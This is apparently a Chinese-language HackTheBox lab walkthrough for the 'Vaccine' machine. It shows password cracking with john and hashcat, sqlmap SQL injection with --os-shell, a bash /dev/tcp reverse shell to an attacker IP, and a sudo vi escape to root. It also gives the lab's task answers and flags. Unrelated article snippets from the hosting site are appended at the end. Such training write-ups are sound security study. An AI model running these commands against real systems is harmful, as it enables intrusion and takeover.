HackTheBox-Starting Point--Tier 2---Vaccine

文章目录

  • 一 Vaccine 测试过程
    • 1.1 打点
      • 1.1.1 FTP匿名登录
      • 1.1.2 SQL注入
    • 1.2 权限提升
  • 二 题目


一 Vaccine 测试过程


1.1 打点

  1.端口扫描

nmap -sV -sC 10.129.191.63

在这里插入图片描述


1.1.1 FTP匿名登录


  2.FTP允许匿名登录,发现backup.zip

ftp 10.129.191.63

在这里插入图片描述

  解压backup.zip,但是需要密码:

在这里插入图片描述

3.使用john解密backup.zip

# 获得中间Hash文件
zip2john backup.zip > hashes

在这里插入图片描述

cat hashes

在这里插入图片描述

# 暴力破解hash
john -wordlist=rockyou.txt hashes

在这里插入图片描述
  使用获取到的密码解压backup.zip 密码:741852963

4.backup.zip文件信息泄漏

  解压完成后,发现index.php、style.css,查看index.php,发现用户名admin和密码hash

在这里插入图片描述

admin:2cb42f8734ea607eefed3b70af13bbd3

5.破解密码

  检测密码2cb42f8734ea607eefed3b70af13bbd3属于哪种hash

hashid 2cb42f8734ea607eefed3b70af13bbd3

在这里插入图片描述

  爆破hash密码,得到密码是qwerty789

echo '2cb42f8734ea607eefed3b70af13bbd3' > hash
hashcat -a 0 -m 0 hash rockyou.txt    

在这里插入图片描述


1.1.2 SQL注入


6.访问80端口,admin:qwerty789登录
在这里插入图片描述

在这里插入图片描述

7.搜索接口使用$searc变量,尝试对其进行注入
在这里插入图片描述

sqlmap -u 'http://10.129.191.63/dashboard.php?search=any+query' --cookie="PHPSESSID=3cir5tlpnugpfuqltp7be06o68" -batch

在这里插入图片描述

  存在注入漏洞,使用sqlmap的os-shell参数获取一个shell

sqlmap -u 'http://10.129.191.63/dashboard.php?search=any+query' --cookie="PHPSESSID=3cir5tlpnugpfuqltp7be06o68" -batch --os-shell

在这里插入图片描述

8.获取反弹shell

  开启监听:

ncat -lnvp 1234

  执行反弹shell:

bash -c "bash -i >& /dev/tcp/10.10.14.20/1234 0>&1"

在这里插入图片描述

在这里插入图片描述

  获取交互式shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

  获取用户flag:

在这里插入图片描述


1.2 权限提升


1.在postgres用户shell中寻找有用线索

  在/var/www/html目录下发现如下文件:

在这里插入图片描述

  查看dashboard.php文件发现:

在这里插入图片描述

2.使用postgres:P@s5w0rd!进行ssh登录

在这里插入图片描述

3.查看sudo权限

sudo -l

在这里插入图片描述

  输出显示 postgres用户权限下,可以使用sudo权限编辑pg_hba.conf文件。

4.编辑pg_hba.conf获取shell

# 打开pg_hba.conf
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# 输入,直接输入 : 进行输入,无须打开编辑模式
:set shell=/bin/sh

在这里插入图片描述

# 打开pg_hba.conf
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# 输入,直接输入 : 进行输入,无须打开编辑模式,编辑完成使用回车退出
:shell

  获取到root权限:

在这里插入图片描述
  查找flag:
在这里插入图片描述


二 题目


Tags

Web、Network、Vulnerability Assessment、Databases、Injection、Custom Applications、Protocols、Source Code Analysis、Apache、PostgreSQL、FTP、PHP、Reconnaissance、Password Cracking、SUDO Exploitation、SQL Injection、Remote Code Execution、Clear Text Credentials、Anonymous/Guest Access

译文:Web、Network、漏洞评估、数据库、注入、自定义应用程序、协议、源代码分析、Apache、PostgreSQL数据库、FTP、PHP、侦察、密码破解、SUDO 开发、SQL注入、远程代码执行、明文凭据、匿名访问

Connect

To attack the target machine, you must be on the same network.Connect to the Starting Point VPN using one of the following options.
It may take a minute for HTB to recognize your connection.If you don't see an update after 2-3 minutes, refresh the page.

译文:要攻击目标机器,您必须位于同一网络上。使用以下选项之一连接到起点 VPN。
HTB 可能需要一分钟才能识别您的连接。如果 2-3 分钟后没有看到更新,请刷新页面。

SPAWN MACHINE

Spawn the target machine and the IP will show here.

译文:生成目标机器,IP 将显示在此处

TASK 1

Besides SSH and HTTP, what other service is hosted on this box?

译文:除了 SSH 和 HTTP 之外,这个盒子上还托管了哪些其他服务?

答:FTP

TASK 2


This service can be configured to allow login with any password for specific username. What is that username?

译文:此服务可以配置为允许使用特定用户名的任何密码登录。那个用户名是什么?

答:anonymous

TASK 3

What is the name of the file downloaded over this service?

译文:通过此服务下载的文件的名称是什么?

答:backup.zip

TASK 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

译文:John The Ripper 工具集附带了什么脚本,并从受密码保护的 zip 存档中以允许破解尝试的格式生成哈希值?

答:zip2john

TASK 5

What is the password for the admin user on the website?

译文:网站上管理员用户的密码是什么?

答:qwerty789

TASK 6

What option can be passed to sqlmap to try to get command execution via the sql injection?

译文:可以向 sqlmap 传递什么选项以尝试通过 sql 注入执行命令?

答:--os-shell

TASK 7

What program can the postgres user run as root using sudo?

译文:postgres 用户可以使用 sudo 以 root 身份运行什么程序?

答:vi

SUBMIT FLAG

Submit user flag

译文:用户flag

答:ec9b13ca4d6229cd5cc1e09980965bf7

SUBMIT FLAG

Submit root flag

译文:提交root flag

答:dd6e058e814260bc70e9bbdef2715849

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/145091.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Docker-minio部署

1.创建目录 创建文件目录,用来存放配置和上传文件目录 (1)Minio 外部挂载的配置文件(/mydata/minio/config) (2)存储上传文件的目录(/mydata/minio/data) mkdir -p /home/minio/config mkdir -p /home/minio/data2.拉…

黑群晖断电导致存储空间已损毁修复记录

黑群晖断电2次,担心的事情还是发生了,登录后提示存储空间已损毁...... 开干!! 修复方式: 1.使用SSH登录到群晖,查看相关信息 # 登录后先获取最高权限 root@DiskStation:~# sudo -i # 检测存储池状态 root@DiskStation:~# cat /proc/mdstat Personalities : [linear] […

【JavaEE】Servlet API 详解(HttpServletRequest类)

二、HttpServletRequest Tomcat 通过 Socket API 读取 HTTP 请求(字符串), 并且按照 HTTP 协议的格式把字符串解析成 HttpServletRequest 对象(内容和HTTP请求报文一样) 1.1 HttpServletRequest核心方法 1.2 方法演示 WebServlet("/showRequest&…

M2LC-Net

模型结构 作者未提供代码

Eclipse使用配置tomcat服务:未识别的web项目

问题1:未识别的项目 解决:elispse未识别到改项目为Web项目

DDD设计模式需要在存储层之前就需要有ID,如何实现?

在DDD设计领域中, 聚合根 或者实体在存储层之前就需要有id。一般采用如下类提前生成,然后直接落库。 DDD元素 在使用DDD设计系统时,主要包括Entity,Value Object,Service,Aggregate,Repository,Factory,Domain Event,Moudle等元素 在建模时,Entity可以用来代表一个事物…

【MySQL】事务(下)

文章目录 1. 各个隔离级别的演示事务隔离级别 —— 读未提交事务隔离级别—— 读提交事务隔离级别 —— 可重复读事务隔离级别 —— 串行化脏读 不可重复读 幻读的理解 2. MVCC机制读写3个记录隐藏列字段undo日志模拟MVCCread view 理论 3. 读提交与 可重复读的区别两者本质区别…

HarmonyOS分布式文件系统开发指导

分布式文件系统概述 分布式文件系统(hmdfs,HarmonyOS Distributed File System)提供跨设备的文件访问能力,适用于如下场景: 两台设备组网,用户可以利用一台设备上的编辑软件编辑另外一台设备上的文档。平板…

AI大模型的制作:RAG和向量数据库,分别是什么?

目录 一、什么是 AI 大模型 二、RAG 三、向量数据库 四、如何制作一个好的 AI 大模型 一、什么是 AI 大模型 AI大模型是指具有大规模参数和复杂结构的人工智能模型。传统的机器学习模型通常有限的参数量,而AI大模型则通过增加参数量和层数来提升模型的表达能力…

黑客泄露 3500 万条 LinkedIn 用户记录

被抓取的 LinkedIn 数据库分为两部分泄露:一部分包含 500 万条用户记录,第二部分包含 3500 万条记录。 LinkedIn 数据库保存了超过 3500 万用户的个人信息,被化名 USDoD 的黑客泄露。 该数据库在臭名昭著的网络犯罪和黑客平台 Breach Forum…

经纬恒润马来西亚工厂正式投入试运行

2023年11月,经纬恒润在中国境外的第一家工厂正式投入试运行。新工厂位于马来西亚,于2023年4月开始筹建,规划总产能500万个汽车电子控制器,主要用于生产新能源汽车电子产品,以满足国外客户日益增长的需求。 经纬恒润马来…

C语言从入门到精通之【字符串】

C语言没有专门用于储存字符串的变量类型,字符串都被储存在char类型的数组中。数组由连续的存储单元组成,字符串中的字符被储存在相邻的存储单元中,每个单元储存一个字符,每个字符占1个字节。 数组末尾位置的字符\0。这是空字符&am…

Eclipse使用配置tomcat服务:部署找不到web.xml

问题:部署找不到web.xml及其他资源文件。只有lib和class 解决:将web.xml所在目录添加到部署配置里

设备数据如何为预测性维护提供支持

预测性维护是现代制造业中一种高效而受欢迎的维护策略,它能够帮助企业提前发现设备故障的早期迹象,并采取相应措施,从而避免生产线的停机和生产效率的下降。实施预测性维护的关键在于充分利用设备数据,通过数据的收集、处理和分析…

yolo如何画框、如何变换目标检测框的颜色和粗细、如何运行detect脚本

这段代码是一个使用YOLO模型进行目标检测的Python脚本。下面我将逐步解释脚本的主要部分,并提供一些关于超参数的使用方法。 1. 脚本结构 导入相关库设置配置参数加载YOLO模型运行目标检测处理检测结果显示或保存结果 2. 超参数说明 --weights: 指定YOLO模型的…

工业控制(ICS)学习笔记

目标:工业互联网安全的比赛 工控CTF之协议分析1——Modbus_ctf modbus-CSDN博客 常见的工控协议有:Modbus、MMS、IEC60870、MQTT、CoAP、COTP、IEC104、IEC61850、S7comm、OMRON等 不用看了,没太多技术含量,做了一会发现全得看答案…

敏捷开发工具有哪些?这款在线敏捷工具好评如潮!

随着软件开发的日渐复杂,敏捷开发方法已经成为当前软件开发的主流方式之一。敏捷开发是一种快速且灵活的软件开发方法,以快速响应需求变化和提供高质量软件为目标。在敏捷开发过程中,使用合适的敏捷工具能够更好地辅助开发团队进行协作和管理…

接口自动化测试(Python+Requests+Unittest)合集详解教程

(1)接口自动化测试的优缺点 优点: 测试复用性。维护成本相对UI自动化低一些。回归方便。可以运行更多更繁琐的测试。 自动化的一个明显的好处是可以在较少的时间内运行更多的测试。为什么UI自动化维护成本更高? 因为前端页面变…

小程序实现语音识别功能

不废话&#xff0c;直接上代码 <template><view><u-popupround"16" :show"recordShow" :close-on-click-overlay"false":safe-area-inset-bottom"false"close"close"open"open"><view clas…